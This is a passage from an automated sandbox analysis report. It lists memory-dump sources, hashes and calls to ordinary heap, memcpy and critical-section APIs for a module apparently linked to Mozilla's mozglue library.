                                                                  • EnterCriticalSection.KERNEL32(6C0DE7DC,?,00000000), ref: 6C0909F3
                                                                  • LeaveCriticalSection.KERNEL32(6C0DE7DC), ref: 6C090ACB
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$EnterLeave
                                                                  • String ID:
                                                                  • API String ID: 3168844106-0
                                                                  • Opcode ID: 28412c5ce5bcf29b6cedcdb1cfef3e11168f1982787069e8c9dc00811602ddf8
                                                                  • Instruction ID: 7745adcaa69589140f7e93421a5bcbfaacf7c8ecaa740ce48cf3b0e0f3b8b9ea
                                                                  • Opcode Fuzzy Hash: 28412c5ce5bcf29b6cedcdb1cfef3e11168f1982787069e8c9dc00811602ddf8
                                                                  • Instruction Fuzzy Hash: 0A51083270A650CBEB049B19C404769B3F6EF8AB2C725813ADD7597F80DB31F8419AC1
                                                                  APIs
                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,6C0AB2C9,?,?,?,6C0AB127,?,?,?,?,?,?,?,?,?,6C0AAE52), ref: 6C0AB628
                                                                    • Part of subcall function 6C0A90E0: free.MOZGLUE(?,00000000,?,?,6C0ADEDB), ref: 6C0A90FF
                                                                    • Part of subcall function 6C0A90E0: free.MOZGLUE(?,00000000,?,?,6C0ADEDB), ref: 6C0A9108
                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6C0AB2C9,?,?,?,6C0AB127,?,?,?,?,?,?,?,?,?,6C0AAE52), ref: 6C0AB67D
                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6C0AB2C9,?,?,?,6C0AB127,?,?,?,?,?,?,?,?,?,6C0AAE52), ref: 6C0AB708
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,6C0AB127,?,?,?,?,?,?,?,?), ref: 6C0AB74D
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: freemalloc
                                                                  • String ID:
                                                                  • API String ID: 3061335427-0
                                                                  • Opcode ID: 64e81a38ec1d8ec24de67d3bac2be992572c18159f990d69b6df325bb76297b1
                                                                  • Instruction ID: ba91d533640b5a71a88c00c5405216649e32b17991cd9c9c8182afd712b355d9
                                                                  • Opcode Fuzzy Hash: 64e81a38ec1d8ec24de67d3bac2be992572c18159f990d69b6df325bb76297b1
                                                                  • Instruction Fuzzy Hash: D351DD71A0121A8FDB14CFD8C98076EBBF5FF48304F458529C85AAB712DB71A906CBA1
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 53df978ff7f595559b8d5fc9d64f04a4532de2df0e4a341ba6c4d203c2611f54
                                                                  • Instruction ID: c1bf100569848605c89326d81ff26e69a252b953c1849fc4dc187df7e709dbe8
                                                                  • Opcode Fuzzy Hash: 53df978ff7f595559b8d5fc9d64f04a4532de2df0e4a341ba6c4d203c2611f54
                                                                  • Instruction Fuzzy Hash: 1051A0B1A01206CFDB04CF1AC88878ABBF1FF48318F558269D9199BB81D771E895CF90
                                                                  APIs
                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,6C09FF2A), ref: 6C0ADFFD
                                                                    • Part of subcall function 6C0A90E0: free.MOZGLUE(?,00000000,?,?,6C0ADEDB), ref: 6C0A90FF
                                                                    • Part of subcall function 6C0A90E0: free.MOZGLUE(?,00000000,?,?,6C0ADEDB), ref: 6C0A9108
                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6C09FF2A), ref: 6C0AE04A
                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6C09FF2A), ref: 6C0AE0C0
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,6C09FF2A), ref: 6C0AE0FE
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: freemalloc
                                                                  • String ID:
                                                                  • API String ID: 3061335427-0
                                                                  • Opcode ID: 2158b747d0872bf7112c7132c3c781daa509c8e51c8e29248b918c00fb84020f
                                                                  • Instruction ID: ef5f788811cf0ce95f830be937f89bca5c6406fd362bf565a227af0463f60173
                                                                  • Opcode Fuzzy Hash: 2158b747d0872bf7112c7132c3c781daa509c8e51c8e29248b918c00fb84020f
                                                                  • Instruction Fuzzy Hash: AD41D3717042168FEB14CFE9C880B5A77F1AB45304F144A3DD626DB741E731E966CB92
                                                                  APIs
                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000024), ref: 6C0B61DD
                                                                  • memcpy.VCRUNTIME140(00000000,00000024,-00000070), ref: 6C0B622C
                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001), ref: 6C0B6250
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C0B6292
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: malloc$freememcpy
                                                                  • String ID:
                                                                  • API String ID: 4259248891-0
                                                                  • Opcode ID: 50c374f411b596a83d1b0591ae47f5c4c835392e2ca2b88b24ca033b73935f6b
                                                                  • Instruction ID: a5a1a08c14fa8e69d00b150036d3a0ac19e1b07454a3470a19c87c042e19972c
                                                                  • Opcode Fuzzy Hash: 50c374f411b596a83d1b0591ae47f5c4c835392e2ca2b88b24ca033b73935f6b
                                                                  • Instruction Fuzzy Hash: 4E31E971A00A0A8FEB08CF2CD8807AA77E9FF55308F144539D55AE7651EB32E558C750
                                                                  APIs
                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000018), ref: 6C0A6EAB
                                                                  • memcpy.VCRUNTIME140(00000000,00000018,-000000A0), ref: 6C0A6EFA
                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001), ref: 6C0A6F1E
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C0A6F5C
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: malloc$freememcpy
                                                                  • String ID:
                                                                  • API String ID: 4259248891-0
                                                                  • Opcode ID: f02c17fc229b1136dcca03926bcfcdc6af5ac6ab8f16785747d4d0f574dded62
                                                                  • Instruction ID: a839d6956c660330ff3bc4eac10c76d7239361cb851848e8ffdd6691755023e3
                                                                  • Opcode Fuzzy Hash: f02c17fc229b1136dcca03926bcfcdc6af5ac6ab8f16785747d4d0f574dded62
                                                                  • Instruction Fuzzy Hash: FF31E571A1060A8FDB04CFACC9807AE73F9EB95344F504239D41AC7652EF31E65AC790
                                                                  APIs
                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,6C060A4D,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C0BB5EA
                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000020,?,6C060A4D,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C0BB623
                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,?,6C060A4D,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C0BB66C
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,6C060A4D,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C0BB67F
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: malloc$free
                                                                  • String ID:
                                                                  • API String ID: 1480856625-0
                                                                  • Opcode ID: f1928531b46c8f46583598ca18c5eb6fdbb09271301773ec4ce49f6106b5be65
                                                                  • Instruction ID: 9926c30e7b078b18a78415ad961ee59214a4aa0a170c273eb11d32bb8a27087d
                                                                  • Opcode Fuzzy Hash: f1928531b46c8f46583598ca18c5eb6fdbb09271301773ec4ce49f6106b5be65
                                                                  • Instruction Fuzzy Hash: 3F31D271A012168FDB10CF58C88475ABBFAFF85304F568669C846EB201EB36ED15CBA1
                                                                  APIs
                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000010,?,?,?,?,?,?,?,?,?,?,?,?,?,00000008), ref: 6C06BBF4
                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,00000008), ref: 6C06BC66
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000008), ref: 6C06BC96
                                                                  • memcpy.VCRUNTIME140(00000000,00000010,0000001F,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C06BCCE
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: malloc$freememcpy
                                                                  • String ID:
                                                                  • API String ID: 4259248891-0
                                                                  • Opcode ID: 343249a693c0d05e264ff038e8b132824a764b391c460440d73f6f41aeacbe43
                                                                  • Instruction ID: 67efa73270996ea97a0d8f8164c00a46e627cb8be62628caf58bef95cb257215
                                                                  • Opcode Fuzzy Hash: 343249a693c0d05e264ff038e8b132824a764b391c460440d73f6f41aeacbe43
                                                                  • Instruction Fuzzy Hash: 312126B1B002054BF7008F3ECC8572E76E9EB8532CF544A39E956D7B51EE70E644A3A1
                                                                  APIs
                                                                  • memcpy.VCRUNTIME140(?,?,00010000), ref: 6C08F611
                                                                  • memcpy.VCRUNTIME140(?,?,?), ref: 6C08F623
                                                                  • memcpy.VCRUNTIME140(?,?,00010000), ref: 6C08F652
                                                                  • memcpy.VCRUNTIME140(?,?,?), ref: 6C08F668
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: memcpy
                                                                  • String ID:
                                                                  • API String ID: 3510742995-0
                                                                  • Opcode ID: cd72a4b24c16f126375525e6a79600fc7eb806012afa7aeaa1976f5403f08771
                                                                  • Instruction ID: 4b5bee5b89da57a5bccedb96bd2f61555e1583fa1a00cd9bbe48c4fecea76c31
                                                                  • Opcode Fuzzy Hash: cd72a4b24c16f126375525e6a79600fc7eb806012afa7aeaa1976f5403f08771
                                                                  • Instruction Fuzzy Hash: 1D313E71B01214AFCB14CF69DCC0B9E7BF9EB84354B14C539EA598BB04D631F9448B90
                                                                  APIs
                                                                  • memcpy.VCRUNTIME140(?,?,?), ref: 6C06B96F
                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000020), ref: 6C06B99A
                                                                  • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C06B9B0
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C06B9B9
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: memcpy$freemalloc
                                                                  • String ID:
                                                                  • API String ID: 3313557100-0
                                                                  • Opcode ID: ee983023be368911aa417a8767e90131f8e33cc2dbbcd30f0987ae7325db83ee
                                                                  • Instruction ID: 4d0c338d15259847dd00c7e451a267d264846fa4cf191babc995a5dbaa125605
                                                                  • Opcode Fuzzy Hash: ee983023be368911aa417a8767e90131f8e33cc2dbbcd30f0987ae7325db83ee
                                                                  • Instruction Fuzzy Hash: 58114FF1A002059FCB04DF69D8809AFBBF8BF98314B14853AE91AD3701E731A915CAA1
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: free
                                                                  • String ID:
                                                                  • API String ID: 1294909896-0
                                                                  • Opcode ID: e25ebae60169f28e1060f7e07576568730df40d2f4281a0ae9ff5def6eed7d38
                                                                  • Instruction ID: ae8afa6331fd42db902184b0647b11ff9f42a312787b8f99ecccdac3b4c8c911
                                                                  • Opcode Fuzzy Hash: e25ebae60169f28e1060f7e07576568730df40d2f4281a0ae9ff5def6eed7d38
                                                                  • Instruction Fuzzy Hash: 22F0F9B67012005BE7149ED9D884B4B73EDEF41218B100135EA1EC3B13E731F91AC6A6